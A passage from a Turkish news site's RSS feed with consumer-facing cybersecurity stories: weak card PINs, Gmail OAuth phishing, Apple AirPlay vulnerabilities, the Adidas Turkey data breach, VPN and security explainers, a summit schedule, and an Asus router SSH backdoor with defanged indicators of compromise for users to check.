<content:encoded><![CDATA[<p><br data-start="380" data-end="383"><strong data-start="383" data-end="439">Kart kullanımı artarken güvenlik riskleri de büyüyor</strong><br data-start="439" data-end="442">Kredi kartlarının kullanım oranı her geçen gün artış gösteriyor. Özellikle online alışveriş ve temassız ödeme sistemlerinin yaygınlaşması, kartları hem kolaylık hem de siber saldırılar açısından gündeme taşıyor.</p>
<p></p>
<p data-start="657" data-end="995"><strong data-start="657" data-end="704">Kart şifreleri siber saldırıların hedefinde</strong><br data-start="704" data-end="707">Nakit paranın alım gücünün azaldığı günümüzde, kredi kartları günlük hayatın ayrılmaz bir parçası haline geldi. Bu durum, kart şifrelerinin güvenliğini her zamankinden daha önemli hale getiriyor. Ancak uzmanlar, kullanıcıların büyük kısmının ciddi şifre hataları yaptığını ifade ediyor.</p>
<p data-start="997" data-end="1403"><strong data-start="997" data-end="1062">En çok tercih edilen şifreler hackerların ilk denemesi oluyor</strong><br data-start="1062" data-end="1065">Siber güvenlik araştırmalarına göre, en çok tercih edilen 4 haneli şifreler arasında “1234”, “0000”, “1111” ve doğum yılı gibi kolay tahmin edilebilecek rakamlar yer alıyor. Bu tür kombinasyonlar, dolandırıcılar tarafından ilk denenenler arasında bulunuyor. Otomatik yazılımlar sayesinde bu tarz şifreler saniyeler içinde çözülebiliyor.</p>
<p data-start="1405" data-end="1697"><strong data-start="1405" data-end="1446">Uzmanlardan güvenli şifre tavsiyeleri</strong><br data-start="1446" data-end="1449">Uzmanlar, kart şifresi belirlerken tahmin edilmesi zor ve rastgele sayı kombinasyonlarının kullanılmasını öneriyor. Ayrıca, şifrenin telefon PIN koduyla aynı olmaması ve düzenli aralıklarla değiştirilmesi de güvenlik açısından kritik öneme sahip.</p>
<p data-start="1699" data-end="1882"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Google&amp;apos;dan Gmail kullanıcılarına kritik uyarı: &amp;apos;no&#45;reply&amp;apos; adresinden gelen bu e&#45;postalara dikkat</title>
<link>https://www.ajansexpres.com.tr/googledan-gmail-kullanicilarina-kritik-uyari-no-reply-adresinden-gelen-bu-e-postalara-dikkat</link>
<guid>https://www.ajansexpres.com.tr/googledan-gmail-kullanicilarina-kritik-uyari-no-reply-adresinden-gelen-bu-e-postalara-dikkat</guid>
<description><![CDATA[ Google, 2 milyar kullanıcıyı etkileyebilecek yeni bir dolandırıcılık yöntemi konusunda uyardı. Şirket, &#039;no-reply@accounts.google.com&#039; adresinden gelmiş gibi görünen sahte e-postaların kullanıcıları hedef aldığını belirterek, bu mesajların açılmadan silinmesi gerektiğini vurguladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948445245b9.webp" length="14196" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:33 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>no-reply e-postası nedir, Google sahte e-postaları nasıl tanıyor, OAuth sistemi nasıl suistimal ediliyor, Gmail kullanıcıları kendilerini nasıl koruyabilir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="422" data-end="425"><strong data-start="425" data-end="472">Gmail kullanıcılarına siber saldırı uyarısı</strong><br data-start="472" data-end="475">Google, dünya genelinde yaklaşık 2 milyar kullanıcıyı hedef alan yeni bir siber saldırı dalgasına karşı kullanıcılarını uyardı. Şirketten yapılan açıklamaya göre, dolandırıcılar, ‘<a data-start="655" data-end="683" class="cursor-pointer" rel="noopener">no-reply@accounts.google.com</a>’ adresinden gönderilmiş gibi görünen sahte e-postalarla kullanıcıları kandırmaya çalışıyor.</p>
<p></p>
<p data-start="777" data-end="1141"><strong data-start="777" data-end="824">Sahte güvenlik mesajlarıyla tuzak kuruluyor</strong><br data-start="824" data-end="827">Bu saldırı yöntemi, “no-reply e-posta saldırısı” olarak adlandırılıyor. Kullanıcılara, hesaplarıyla ilgili sözde “yasal süreç” gerekçesiyle bilgi talep eden e-postalar gönderiliyor. Mesajlarda yer alan bağlantılar, sahte bir Google destek sayfasına yönlendirme yaparak kişisel bilgilerin paylaşılması hedefleniyor.</p>
<p data-start="1143" data-end="1577"><strong data-start="1143" data-end="1187">Bağlantılara tıklamak büyük risk taşıyor</strong><br data-start="1187" data-end="1190">Siber güvenlik uzmanları, bu e-postalardaki bağlantılara tıklanmasının ciddi sonuçlara yol açabileceğini belirtiyor. Bu bağlantılar aracılığıyla zararlı yazılımlar indirilebiliyor ya da parola hırsızlığına neden olan sahte sayfalara erişim sağlanabiliyor. Bazı durumlarda, sadece bağlantıdaki belgelerin görüntülenmesi bile Gmail ve Google Drive içeriklerine kısmi erişim sağlayabiliyor.</p>
<p data-start="1579" data-end="1981"><strong data-start="1579" data-end="1633">OAuth sistemi üzerinden yetkisiz erişim sağlanıyor</strong><br data-start="1633" data-end="1636">Yazılım geliştiricisi Nick Johnson, saldırganların Google’ın OAuth sistemini suistimal ettiğini açıkladı. Bu yöntemle sahte uygulamalar oluşturularak, kullanıcıdan bu uygulamalara erişim izni vermesi isteniyor. Johnson, bu tekniği “en tehlikeli tuzak” olarak tanımlıyor ve yalnızca resmi Google bildirimlerine güvenilmesi gerektiğini vurguluyor.</p>
<p data-start="1983" data-end="2418"><strong data-start="1983" data-end="2015">Google’dan korunma önerileri</strong><br data-start="2015" data-end="2018">Google, ‘güvenlik’, ‘hesap doğrulama’ ya da ‘yasal işlem’ gibi aciliyet içeren ifadelerle gelen e-postalara karşı dikkatli olunması gerektiğini belirtti. Bu tür mesajlar genellikle kullanıcıları korkutarak harekete geçirmeyi amaçlayan dolandırıcılık girişimleridir. Şirket, kullanıcıların e-posta gönderen adresini mutlaka kontrol etmesi ve şüpheli e-postaları açmadan silmesi gerektiğini ifade etti.</p>
<p data-start="2420" data-end="2515">Ayrıca Google, kullanıcıların hesap güvenliğini artırmak için şu iki adımı atmasını öneriyor:</p>
<ul data-start="2516" data-end="2721">
<li data-start="2516" data-end="2585">
<p data-start="2518" data-end="2585">İki Aşamalı Kimlik Doğrulama (2FA) özelliğini aktif hale getirin.</p>
</li>
<li data-start="2586" data-end="2721">
<p data-start="2588" data-end="2721">Gmail hesabınıza erişimi olan üçüncü taraf uygulamaları düzenli olarak kontrol edin ve ihtiyaç dışı olanların erişim iznini kaldırın.</p>
</li>
</ul>
<p data-start="2723" data-end="2893"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Apple’dan kritik uyarı: AirPlay özelliği kapatılmazsa cihazlar tehlikede</title>
<link>https://www.ajansexpres.com.tr/appledan-kritik-uyari-airplay-oezelligi-kapatilmazsa-cihazlar-tehlikede</link>
<guid>https://www.ajansexpres.com.tr/appledan-kritik-uyari-airplay-oezelligi-kapatilmazsa-cihazlar-tehlikede</guid>
<description><![CDATA[ Apple, AirPlay protokolünde keşfedilen 23 güvenlik açığı nedeniyle iPhone kullanıcılarını uyardı. Şirket, kullanıcıların AirPlay özelliğini kapatmalarını ve cihazlarını güncellemelerini tavsiye etti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484418bb2e.webp" length="9338" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:29 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>AirPlay açığı nedir, iPhone kullanıcıları AirPlay’i nasıl kapatır, Apple AirPlay güvenlik açıklarına karşı ne öneriyor, AirBorne güvenlik açığı hangi cihazları etkiliyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="328" data-end="331"><strong data-start="331" data-end="388">Apple’dan AirPlay güvenlik açığına karşı önemli uyarı</strong><br data-start="388" data-end="391">Apple, AirPlay özelliğinde ortaya çıkan çok sayıda güvenlik açığı nedeniyle iPhone kullanıcılarına kritik bir uyarıda bulundu. Şirket, "AirBorne" adı verilen bu açıklar sebebiyle AirPlay kullanımının derhal durdurulmasını önerdi.</p>
<p></p>
<p data-start="624" data-end="938"><strong data-start="624" data-end="664">23 ayrı güvenlik açığı tespit edildi</strong><br data-start="664" data-end="667">Siber güvenlik firması Oligo’nun yaptığı araştırmaya göre, Apple’ın AirPlay protokolünde 23’e kadar güvenlik açığı bulunuyor. Bu açıkların büyük çoğunluğu, üçüncü taraf cihazların AirPlay uyumluluğu için kullanılan Yazılım Geliştirme Kiti (SDK) üzerinden kaynaklanıyor.</p>
<p data-start="940" data-end="1284"><strong data-start="940" data-end="991">Uzaktan erişim ve sıfır tıklama saldırısı riski</strong><br data-start="991" data-end="994">Oligo CTO’su Gal Elbaz, bu açıkların bilgisayar korsanları tarafından sıfır tıklamalı saldırılar düzenlemek için kullanılabileceğini belirtti. Saldırganlar, aynı Wi-Fi ağına bağlı cihazlara kullanıcı etkileşimi olmadan erişebiliyor, kötü amaçlı yazılım yükleyebiliyor ve veri çalabiliyor.</p>
<p data-start="1286" data-end="1586"><strong data-start="1286" data-end="1332">Apple'dan kullanıcılarına güvenlik çağrısı</strong><br data-start="1332" data-end="1335">Apple, bu güvenlik açıklarına karşı alınabilecek en etkili önlemin, AirPlay özelliğinin devre dışı bırakılması ve iPhone'ların en son sürüme güncellenmesi olduğunu açıkladı. Ayrıca yalnızca güvenilir kaynaklardan dosya alınması gerektiği vurgulandı.</p>
<p data-start="1588" data-end="1776"><strong data-start="1588" data-end="1600"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Adidas Türkiye&amp;apos;de 544 Binden Fazla Kişisel Veri Sızdırıldı: KVKK Resmen Duyurdu</title>
<link>https://www.ajansexpres.com.tr/adidas-turkiyede-544-binden-fazla-kisisel-veri-sizdirildi-kvkk-resmen-duyurdu</link>
<guid>https://www.ajansexpres.com.tr/adidas-turkiyede-544-binden-fazla-kisisel-veri-sizdirildi-kvkk-resmen-duyurdu</guid>
<description><![CDATA[ Adidas&#039;ın global sistemine yapılan siber saldırı sonucu Türkiye&#039;deki 544.395 kullanıcının kişisel verileri sızdırıldı. KVKK, ihlal sonrası yapılan bildirim ve soruşturma sürecine dair detaylı açıklama yaptı. E-posta, doğum tarihi, telefon numarası ve daha fazlası tehlikede. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894843d6051f.webp" length="25040" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:25 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Adidas veri ihlali ne zaman gerçekleşti, kaç kişi etkilendi, hangi kişisel veriler sızdırıldı, KVKK ne tür bir açıklama yaptı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="406" data-end="409"><strong data-start="409" data-end="477">Adidas Türkiye’ye siber saldırı: 544 binden fazla kişi etkilendi</strong><br data-start="477" data-end="480">Kişisel Verileri Koruma Kurumu (KVKK), Adidas Türkiye'ye yönelik gerçekleşen siber saldırı sonucunda, toplamda 544.395 kişinin kişisel bilgilerinin sızdırıldığını kamuoyuna duyurdu. Saldırının Adidas’ın bağlı bulunduğu global altyapı üzerinden yapıldığı ve Türkiye’deki kullanıcıları doğrudan etkilediği bildirildi.</p>
<p></p>
<p data-start="797" data-end="1237"><strong data-start="797" data-end="832">İhlal 17 Mayıs’ta tespit edildi</strong><br data-start="832" data-end="835">Adidas Spor Malzemeleri Satış ve Pazarlama A.Ş. tarafından 17 Mayıs 2025 tarihinde Kuruma yapılan bildirimde, ihlalin bir çalışan tarafından Siber Güvenlik Olaylarına Müdahale Ekibine iletilen bir e-posta ile fark edildiği belirtildi. Söz konusu e-postada, üçüncü bir şahsın müşteri verilerine eriştiği iddia edildi ve eki dosyada yer alan bilgilerin büyük olasılıkla Adidas’a ait olduğu tespit edildi.</p>
<p data-start="1239" data-end="1598"><strong data-start="1239" data-end="1281">Sızdırılan veriler arasında neler var?</strong><br data-start="1281" data-end="1284">KVKK'nın açıklamasına göre, sızdırılan bilgiler arasında kullanıcıların isimleri, e-posta adresleri, cinsiyet bilgileri, doğum tarihleri ve telefon numaraları yer alıyor. Ancak her kullanıcının tüm veri tiplerinden etkilenmediği, bazı kullanıcıların yalnızca belirli bilgileri sızdırılmış olabileceği ifade edildi.</p>
<p data-start="1600" data-end="1834"><strong data-start="1600" data-end="1638">Adidas’tan teknik açıklama gelmedi</strong><br data-start="1638" data-end="1641">Adidas tarafından yürütülen teknik analiz ve güvenlik önlemlerine dair herhangi bir bilgi henüz paylaşılmadı. Saldırının kaynağı ve yöntemine ilişkin soruşturmanın ise halen sürdüğü belirtildi.</p>
<p data-start="1836" data-end="2132"><strong data-start="1836" data-end="1881">KVKK açıklamasına göre süreç devam ediyor</strong><br data-start="1881" data-end="1884">Kurum, Kişisel Verilerin Korunması Kanunu’nun 12. maddesine dayanarak 22 Mayıs 2025 tarihli kararla, söz konusu veri ihlali bildirisinin internet sitesinde yayımlanmasına karar verdi. Sürece ilişkin gelişmelerin kamuoyuyla paylaşılacağı belirtildi.</p>
<p data-start="2134" data-end="2278"><strong data-start="2134" data-end="2146"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Dijital Dünyanın Kalkanı: Siber Güvenlik Neden Her Zamankinden Daha Önemli?</title>
<link>https://www.ajansexpres.com.tr/dijital-dunyanin-kalkani-siber-guvenlik-neden-her-zamankinden-daha-onemli</link>
<guid>https://www.ajansexpres.com.tr/dijital-dunyanin-kalkani-siber-guvenlik-neden-her-zamankinden-daha-onemli</guid>
<description><![CDATA[ Siber güvenlik, dijital sistemlerin dış tehditlerden korunması için hayati öneme sahip bir savunma hattı sunuyor. Kişisel verilerden kritik altyapılara kadar her şeyi hedef alan siber saldırılara karşı alınan önlemler, kurumlar ve bireyler için artık bir lüks değil zorunluluk. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948439702db.webp" length="19744" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:21 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Siber güvenlik neden önemlidir, dijital sistemleri korumak için hangi yöntemler kullanılıyor, siber tehditler hangi alanları hedef alıyor, kritik altyapılar siber saldırılardan nasıl etkileniyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="393" data-end="396"><strong data-start="396" data-end="421">Siber güvenlik nedir?</strong><br data-start="421" data-end="424">Siber güvenlik, bilgisayar sistemlerini, ağları, yazılımları ve verileri yetkisiz erişim, zarar, değişiklik veya çalınma gibi tehditlere karşı koruma sürecidir. Bu koruma, bireylerin kişisel cihazlarından devletlerin kritik altyapılarına kadar uzanan geniş bir dijital alanı kapsar.</p>
<p></p>
<p data-start="708" data-end="1128"><strong data-start="708" data-end="737">Tehditler giderek artıyor</strong><br data-start="737" data-end="740">Günümüzde dijitalleşmenin hızla yayılması, siber saldırganlar için daha fazla hedef yaratmaktadır. Fidye yazılımlar, kimlik avı saldırıları, veri sızıntıları ve devlet destekli siber casusluk faaliyetleri, en sık karşılaşılan tehdit türleri arasında yer alıyor. Bu tehditler yalnızca maddi zarara yol açmakla kalmıyor, aynı zamanda kişisel mahremiyeti ve ulusal güvenliği de riske atıyor.</p>
<p data-start="1130" data-end="1550"><strong data-start="1130" data-end="1164">Koruma yöntemleri çeşitleniyor</strong><br data-start="1164" data-end="1167">Gelişen tehditlere karşı savunma stratejileri de evriliyor. Antivirüs yazılımları, güvenlik duvarları, çok faktörlü kimlik doğrulama sistemleri ve yapay zekâ destekli izleme teknolojileri, siber güvenlik alanında sıkça kullanılan önlemler arasında. Ayrıca çalışanların bilinçlendirilmesi ve düzenli güvenlik eğitimleri de saldırıların başarı oranını düşürmede önemli bir rol oynuyor.</p>
<p data-start="1552" data-end="1927"><strong data-start="1552" data-end="1581">Kritik altyapılar hedefte</strong><br data-start="1581" data-end="1584">Enerji, ulaşım, sağlık gibi sektörlerde kullanılan dijital altyapılar, siber saldırılar açısından öncelikli hedefler arasında yer alıyor. Bu altyapıların güvenliği, kamu güvenliği ve ekonomik istikrar açısından büyük önem taşıyor. Bu nedenle hem özel sektör hem de kamu kurumları siber güvenliğe yatırım yapma konusunda daha hassas davranıyor.</p>
<p data-start="1929" data-end="2165" data-is-last-node="" data-is-only-node=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>VPN kullanımı artıyor: İnternet trafiğini şifreleyerek verileri koruma altına alıyor</title>
<link>https://www.ajansexpres.com.tr/vpn-kullanimi-artiyor-internet-trafigini-sifreleyerek-verileri-koruma-altina-aliyor</link>
<guid>https://www.ajansexpres.com.tr/vpn-kullanimi-artiyor-internet-trafigini-sifreleyerek-verileri-koruma-altina-aliyor</guid>
<description><![CDATA[ Siber tehditlerin arttığı günümüzde kullanıcılar, VPN teknolojisiyle internet üzerindeki veri trafiğini şifreleyerek güvenli bağlantılar kuruyor. Peki VPN tam olarak nasıl çalışıyor ve hangi durumlarda kullanılması öneriliyor? ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948435c7eb9.webp" length="10860" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:17 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>VPN nedir ve nasıl çalışır, VPN internet güvenliğini nasıl sağlar, VPN hangi durumlarda kullanılmalı, VPN ile hangi içeriklere erişim mümkün</media:keywords>
<content:encoded><![CDATA[<p><br data-start="355" data-end="358"><strong data-start="358" data-end="388">VPN nedir ve ne işe yarar?</strong><br data-start="388" data-end="391">Sanal Özel Ağ (VPN), internet kullanıcılarının verilerini korumak amacıyla geliştirilen bir güvenlik teknolojisidir. VPN, kullanıcı ile erişmek istediği internet sitesi arasındaki bağlantıyı şifreleyerek, aradaki tüm veri trafiğinin üçüncü kişiler tarafından izlenmesini ya da çalınmasını engeller.</p>
<p></p>
<p data-start="691" data-end="1001"><strong data-start="691" data-end="731">Veri güvenliği ve gizliliği sağlıyor</strong><br data-start="731" data-end="734">Özellikle halka açık Wi-Fi ağlarında yapılan internet bağlantıları, kötü niyetli kişiler tarafından kolaylıkla takip edilebilmektedir. VPN kullanımı, bu tür riskleri minimize ederek kullanıcının IP adresini gizler, veri paketlerini şifreler ve kimlik koruması sağlar.</p>
<p data-start="1003" data-end="1306"><strong data-start="1003" data-end="1038">Farklı kullanım alanları mevcut</strong><br data-start="1038" data-end="1041">VPN’ler sadece güvenlik için değil, aynı zamanda coğrafi engelleri aşmak ve erişimi kısıtlanmış içeriklere ulaşmak için de kullanılmaktadır. Örneğin, bazı ülkelerde yasaklı olan sosyal medya platformlarına ya da yayın servislerine VPN sayesinde erişim sağlanabilir.</p>
<p data-start="1308" data-end="1571"><strong data-start="1308" data-end="1350">Kurulum ve kullanım kolaylığı sağlıyor</strong><br data-start="1350" data-end="1353">VPN hizmetleri, mobil cihazlardan masaüstü bilgisayarlara kadar geniş bir platformda desteklenmektedir. Çoğu VPN sağlayıcısı, kullanıcı dostu arayüzleri sayesinde hızlı bir kurulum ve kolay kullanım imkânı sunmaktadır.</p>
<p data-start="1573" data-end="1728"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Dijital Tehditler, Yapay Zekâ ve Yerlileşme Gündemiyle 8. Siber Güvenlik Zirvesi Ankara&amp;apos;da Gerçekleştirilecek</title>
<link>https://www.ajansexpres.com.tr/dijital-tehditler-yapay-zeka-ve-yerlilesme-gundemiyle-8-siber-guvenlik-zirvesi-ankarada-gerceklestirilecek-11515</link>
<guid>https://www.ajansexpres.com.tr/dijital-tehditler-yapay-zeka-ve-yerlilesme-gundemiyle-8-siber-guvenlik-zirvesi-ankarada-gerceklestirilecek-11515</guid>
<description><![CDATA[ Türkiye Bilişim Derneği&#039;nin ev sahipliğinde 12 Haziran 2025’te BTK Ana Konferans Salonu&#039;nda düzenlenecek 8. Siber Güvenlik Ekosisteminin Geliştirilmesi Zirvesi, yapay zekâ, kritik altyapılar, yerli teknolojiler ve siber güvenlik girişimciliği gibi konuların ele alınacağı yoğun bir programla sektörün önde gelen isimlerini bir araya getirecek. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894843225a31.webp" length="29598" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:14 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p data-start="491" data-end="910"><strong data-start="512" data-end="572">Siber güvenlik ekosisteminin gelişimi masaya yatırılacak</strong><br data-start="572" data-end="575">Türkiye Bilişim Derneği tarafından organize edilen 8. Siber Güvenlik Ekosisteminin Geliştirilmesi Zirvesi, 12 Haziran 2025 tarihinde Ankara’daki BTK Ana Konferans Salonu'nda gerçekleştirilecek. Etkinlik, kamu, özel sektör ve akademiden uzman isimlerin katılımıyla siber güvenliğin geleceğine dair kritik başlıkları tartışmaya açacak.</p>
<p data-start="912" data-end="1209"><strong data-start="912" data-end="961">Protokol ve sponsor konuşmalarıyla başlayacak</strong><br data-start="961" data-end="964">Zirve, saat 09.00’da kayıt süreciyle başlayacak. 09.45-11.00 saatleri arasında yapılacak protokol konuşmalarında Türkiye Bilişim Derneği Genel Başkanı Kenan Altınsaat ve T.C. Sanayi ve Teknoloji Bakan Yardımcısı Zekeriya Coştu konuşma yapacak.</p>
<p data-start="1211" data-end="1289">11.00-11.15 arasında platin sponsor SAYTEC adına CTO Yakup Saygın konuşacak.</p>
<p data-start="1291" data-end="1780"><strong data-start="1291" data-end="1346">Kritik altyapılar ve yapay zekâ tehditleri gündemde</strong><br data-start="1346" data-end="1349">Saat 11.15’te başlayacak ilk oturumda, 'Kritik Altyapılarda Sessiz Savaş: Dijital Saldırılar, Fiziksel Etkiler, Yapay Zekânın Getirdiği Tehditler' başlığı altında çeşitli alanlardan uzmanlar görüşlerini paylaşacak. Panelin moderatörlüğünü SAU Kritik Altyapılar Ulusal Test Yatağı Merkezi Koordinatörü Prof. Dr. İbrahim Özçelik üstlenecek. Panelde; Ahmet Pekel, Can Demirel, Cem Dursun ve Mahmut Küçük konuşmacı olarak yer alacak.</p>
<p data-start="1782" data-end="2055"><strong data-start="1782" data-end="1820">Yerlileşme ve girişimcilik vurgusu</strong><br data-start="1820" data-end="1823">Öğle yemeğinin ardından saat 13.30’da Türkiye Bilişim Derneği tarafından verilen Siber Güvenlik Ekosistemine Katkı Ödülleri sahiplerini bulacak. 14.00’te Altın Sponsor İNDAS Cybersecurity Kurucu Ortağı Yavuz Aydın konuşma yapacak.</p>
<p data-start="2057" data-end="2233">Aynı saatlerde TED Üniversitesi’nden Prof. Dr. Murat Karakaya, ‘Büyük Dil Modellerinin İmkân ve Kabiliyetleri ile Getirdiği Riskler’ konulu eğitim oturumunu gerçekleştirecek.</p>
<p data-start="2235" data-end="2611">14.15’te başlayacak ikinci panelde ise ‘Siber Savunmada Yerlileşme: Sorunlar ve Fırsatlar; Girişimci, Yatırımcı ve Kamu Perspektifi’ başlığı altında sektörel değerlendirmeler yapılacak. Panelin moderatörlüğünü SSB Türkiye Siber Güvenlik Kümelenmesi Genel Koordinatörü Alpaslan Kesici üstlenecek. Konuşmacılar arasında Hakan Terzioğlu, İsmail Güneş ve Savaş Ergen yer alacak.</p>
<p data-start="2613" data-end="2826"><strong data-start="2613" data-end="2658">Eğitimler ve TEDx konuşmaları ile kapanış</strong><br data-start="2658" data-end="2661">Saat 15.00’te Ankara Üniversitesi’nden Öğr. Gör. Muhammed Saadettin Kaya, 'Mahremiyet Koruyucu Tekniklerin Yapay Zekâ Eğitiminde Kullanımı' konulu eğitimi sunacak.</p>
<p data-start="2828" data-end="2983">15.45-16.45 saatleri arasında TEDx konuşmaları gerçekleştirilecek. Zirve, 16.45-17.15 saatleri arasında yapılacak kapanış ve ödül töreni ile sona erecek.</p>
<p><a href=" Adresi</a></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>9.000 Asus router cihazı sessizce ele geçirildi: Kalıcı arka kapı tespit edildi</title>
<link>https://www.ajansexpres.com.tr/9000-asus-router-cihazi-sessizce-ele-gecirildi-kalici-arka-kapi-tespit-edildi</link>
<guid>https://www.ajansexpres.com.tr/9000-asus-router-cihazi-sessizce-ele-gecirildi-kalici-arka-kapi-tespit-edildi</guid>
<description><![CDATA[ GreyNoise tarafından yayımlanan rapora göre, dünya genelinde yaklaşık 9.000 Asus router cihazına saldırganlar tarafından gizli bir SSH anahtarı yerleştirildi. Bu kalıcı arka kapı, cihaz yeniden başlatılsa ya da yazılımı güncellense bile yönetici erişimi sağlamaya devam ediyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894842e7b4c5.webp" length="8568" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:10 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Hangi Asus router modelleri etkilenmiş olabilir, SSH arka kapısı nasıl çalışıyor, kullanıcılar cihazlarının ele geçirilip geçirilmediğini nasıl anlar, saldırının arkasında kim olabilir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="409" data-end="412"><strong data-start="412" data-end="460">GreyNoise, kalıcı arka kapıyı ortaya çıkardı</strong><br data-start="460" data-end="463">Güvenlik şirketi GreyNoise tarafından yayımlanan son rapora göre, dünya genelinde yaklaşık 9.000 Asus marka router cihazı, kullanıcıların bilgisi dışında gizli bir arka kapı ile ele geçirilmiş durumda. Saldırganların, daha önce Asus tarafından yaması yayınlanan ancak bazıları kamuoyunda pek bilinmeyen güvenlik açıklarını kullanarak router cihazlarına erişim sağladığı belirtiliyor.</p>
<p></p>
<p data-start="848" data-end="1151"><strong data-start="848" data-end="890">CVE-2023-39780 açığı kritik rol oynadı</strong><br data-start="890" data-end="893">Kullanılan açıklardan biri CVE-2023-39780 olarak tanımlanan komut enjeksiyon açığı. Bunun yanı sıra CVE sistemi üzerinden takip edilmeyen açıkların da kullanıldığı bildirildi. Bu da saldırının iz bırakmadan ve dikkat çekmeden gerçekleşmesini kolaylaştırıyor.</p>
<p data-start="1153" data-end="1635"><strong data-start="1153" data-end="1193">Kalıcı kontrol sağlayan SSH anahtarı</strong><br data-start="1193" data-end="1196">Sisteme sızan saldırganlar, router cihazına özel bir SSH anahtarı yerleştirerek kalıcı erişim elde ediyor. Bu anahtara sahip olan kişiler, cihazlara yönetici haklarıyla otomatik olarak bağlanabiliyor. Daha da çarpıcı olan ise, bu erişimin cihaz yeniden başlatıldığında veya firmware güncellemeleri yapıldığında bile geçerliliğini sürdürmesi. GreyNoise araştırmacıları, bu durumun cihazlar üzerinde kalıcı bir kontrol sağladığını aktarıyor.</p>
<p data-start="1637" data-end="2206"><strong data-start="1637" data-end="1677">Devlet destekli siber tehdit şüphesi</strong><br data-start="1677" data-end="1680">Araştırmalara göre, saldırılar Malezya, Avrupa ve Asya kaynaklı IP adreslerinden geliyor. Bu da saldırının arkasında devlet destekli bir aktör olabileceği ihtimalini gündeme getiriyor. İlk belirtiler Mart ayının ortasında tespit edildi ve durum, GreyNoise tarafından ilgili devlet kurumlarına bildirildikten sonra kamuoyuna duyuruldu. Güvenlik firması Sekoia da geçtiğimiz hafta benzer verileri paylaştı. Sekoia'nın analizlerine göre saldırı, ViciousTrap adlı bilinmeyen bir tehdit grubu tarafından gerçekleştirilmiş olabilir.</p>
<p data-start="2208" data-end="2457"><strong data-start="2208" data-end="2236">Kullanıcılar ne yapmalı?</strong><br data-start="2236" data-end="2239">Asus router kullanıcılarının cihazlarını kontrol etmeleri öneriliyor. SSH ayarlarında şu yapılandırmanın bulunup bulunmadığına dikkat edilmeli:<br data-start="2382" data-end="2385"><em data-start="2385" data-end="2457">ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZ...</em></p>
<p data-start="2459" data-end="2798">Eğer bu tür bir anahtar veya port 53282 üzerinden açık bir SSH bağlantısı varsa, cihaz yüksek olasılıkla saldırıya uğramış demektir. Bu durumda, kullanıcıların ilgili anahtarı ve port ayarını manuel olarak silmeleri gerekiyor. Ayrıca aşağıdaki IP adreslerinden gelen bağlantıların sistem günlüklerinde yer alıp almadığı kontrol edilmeli:</p>
<ul data-start="2799" data-end="2878">
<li data-start="2799" data-end="2818">
<p data-start="2801" data-end="2818">101.99.91[.]151</p>
</li>
<li data-start="2819" data-end="2838">
<p data-start="2821" data-end="2838">101.99.94[.]173</p>
</li>
<li data-start="2839" data-end="2859">
<p data-start="2841" data-end="2859">79.141.163[.]179</p>
</li>
<li data-start="2860" data-end="2878">
<p data-start="2862" data-end="2878">111.90.146[.]237</p>
</li>
</ul>
<p data-start="2880" data-end="3048">Uzmanlar, yalnızca Asus değil tüm router kullanıcılarının düzenli yazılım güncellemeleri yapmalarını ve varsayılan yönetici şifrelerini değiştirmelerini tavsiye ediyor.</p>
<p data-start="3050" data-end="3284" data-is-last-node="" data-is-only-node=""><strong data-start="3050" data-end="3062"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Trump döneminin üst düzey isminin telefonu ele geçirildi, yapay zekâ ile personel tuzağa düşürüldü</title>
<link>https://www.ajansexpres.com.tr/trump-doeneminin-ust-duzey-isminin-telefonu-ele-gecirildi-yapay-zeka-ile-personel-tuzaga-dusuruldu</link>
